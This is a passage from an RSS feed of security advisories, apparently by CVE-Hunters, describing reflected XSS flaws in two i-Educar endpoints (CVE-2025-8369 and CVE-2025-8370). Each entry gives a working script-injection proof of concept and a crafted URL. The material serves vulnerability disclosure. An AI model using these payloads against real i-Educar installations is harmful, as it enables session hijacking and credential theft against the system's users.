class=&amp;#34;nx&amp;#34;&amp;gt;E&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;h4 id=&amp;#34;decoded&amp;#34;&amp;gt;Decoded
&amp;lt;/h4&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-javascript&amp;#34; data-lang=&amp;#34;javascript&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;&amp;amp;#39;XSS-PoC&amp;amp;#39;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;/script&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-8369/image.png&amp;#34;
	width=&amp;#34;724&amp;#34;
	height=&amp;#34;774&amp;#34;
	srcset=&amp;#34;/p/cve-2025-8369/image_hu_f2d2374689b068fc.png 480w, /p/cve-2025-8369/image_hu_e432fb0e1e210761.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;93&amp;#34;
		data-flex-basis=&amp;#34;224px&amp;#34;
	
&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;url&amp;#34;&amp;gt;URL
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  /intranet/educar_avaliacao_desempenho_lst.php?titulo_avaliacao=%22%3E%3Cscript%3Ealert%28%27XSS-PoC%27%29%3C%2Fscript%3E
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;When a user accesses this crafted URL, the script is executed immediately in the browser, confirming the vulnerability.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-8369-cross-site-scripting-xss-reflected-in-endpoint-educar_avaliacao_desempenho_lstphp-parameter-titulo_avaliacao&amp;#34;&amp;gt;CVE-2025-8369: Cross-Site Scripting (XSS) Reflected in endpoint &amp;lt;code&amp;gt;educar_avaliacao_desempenho_lst.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;titulo_avaliacao&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-8369&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-8369&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Reflected Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;educar_avaliacao_desempenho_lst.php&amp;lt;/code&amp;gt; endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;titulo_avaliacao&amp;lt;/code&amp;gt; parameter.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;educar_avaliacao_desempenho_lst.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;titulo_avaliacao&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;h4 id=&amp;#34;encoded&amp;#34;&amp;gt;Encoded
&amp;lt;/h4&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-javascript&amp;#34; data-lang=&amp;#34;javascript&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;22&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;3&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;E&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;3&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;Cscript&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;3&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;Ealert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;28&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;27&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;XSS&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;-&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;PoC&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;27&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;29&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;3&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;C&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;2&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;Fscript&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;3&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;E&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;h4 id=&amp;#34;decoded&amp;#34;&amp;gt;Decoded
&amp;lt;/h4&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-javascript&amp;#34; data-lang=&amp;#34;javascript&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;&amp;amp;#39;XSS-PoC&amp;amp;#39;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;/script&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-8369/image.png&amp;#34;
	width=&amp;#34;724&amp;#34;
	height=&amp;#34;774&amp;#34;
	srcset=&amp;#34;/p/cve-2025-8369/image_hu_f2d2374689b068fc.png 480w, /p/cve-2025-8369/image_hu_e432fb0e1e210761.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;93&amp;#34;
		data-flex-basis=&amp;#34;224px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;url&amp;#34;&amp;gt;URL
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  /intranet/educar_avaliacao_desempenho_lst.php?titulo_avaliacao=%22%3E%3Cscript%3Ealert%28%27XSS-PoC%27%29%3C%2Fscript%3E
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;When a user accesses this crafted URL, the script is executed immediately in the browser, confirming the vulnerability.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Stealing session cookies: Attackers can use stolen session cookies to hijack a user&amp;#39;s session and perform actions on their behalf.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Downloading malware: Attackers can trick users into downloading and installing malware on their computers.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Hijacking browsers: Attackers can hijack a user&amp;#39;s browser or deliver browser-based exploits.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Stealing credentials: Attackers can steal a user&amp;#39;s credentials.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Obtaining sensitive information: Attackers can obtain sensitive information stored in a user&amp;#39;s account or in their browser.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Defacing websites: Attackers can deface a website by altering its content.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Damaging a business&amp;#39;s reputation: Attackers can damage a business&amp;#39;s image or spread misinformation by defacing a corporate website.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8369.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8369.md&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Thu, 31 Jul 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-8370</title>
        <link>https://www.cvehunters.com/p/cve-2025-8370/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-8370/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-8370-cross-site-scripting-xss-reflected-in-endpoint-educar_escolaridade_lstphp-parameter-descricao&amp;#34;&amp;gt;CVE-2025-8370: Cross-Site Scripting (XSS) Reflected in endpoint &amp;lt;code&amp;gt;educar_escolaridade_lst.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;descricao&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-8370&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-8370&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Reflected Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;educar_escolaridade_lst.php&amp;lt;/code&amp;gt; endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;descricao&amp;lt;/code&amp;gt; parameter.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;educar_escolaridade_lst.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;descricao&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-javascript&amp;#34; data-lang=&amp;#34;javascript&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;&amp;amp;#39;XSS-PoC&amp;amp;#39;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;/script&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-8370/image.png&amp;#34;
	width=&amp;#34;877&amp;#34;
	height=&amp;#34;800&amp;#34;
	srcset=&amp;#34;/p/cve-2025-8370/image_hu_5f218bc04c4efbce.png 480w, /p/cve-2025-8370/image_hu_61d9d458bc662e2e.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;109&amp;#34;
		data-flex-basis=&amp;#34;263px&amp;#34;
	
&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Stealing session cookies: Attackers can use stolen session cookies to hijack a user&amp;#39;s session and perform actions on their behalf.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Downloading malware: Attackers can trick users into downloading and installing malware on their computers.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Hijacking browsers: Attackers can hijack a user&amp;#39;s browser or deliver browser-based exploits.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Stealing credentials: Attackers can steal a user&amp;#39;s credentials.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Obtaining sensitive information: Attackers can obtain sensitive information stored in a user&amp;#39;s account or in their browser.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Defacing websites: Attackers can deface a website by altering its content.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Damaging a business&amp;#39;s reputation: Attackers can damage a business&amp;#39;s image or spread misinformation by defacing a corporate website.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-8370-cross-site-scripting-xss-reflected-in-endpoint-educar_escolaridade_lstphp-parameter-descricao&amp;#34;&amp;gt;CVE-2025-8370: Cross-Site Scripting (XSS) Reflected in endpoint &amp;lt;code&amp;gt;educar_escolaridade_lst.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;descricao&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-8370&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-8370&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Reflected Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;educar_escolaridade_lst.php&amp;lt;/code&amp;gt; endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;descricao&amp;lt;/code&amp;gt; parameter.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;educar_escolaridade_lst.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;descricao&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
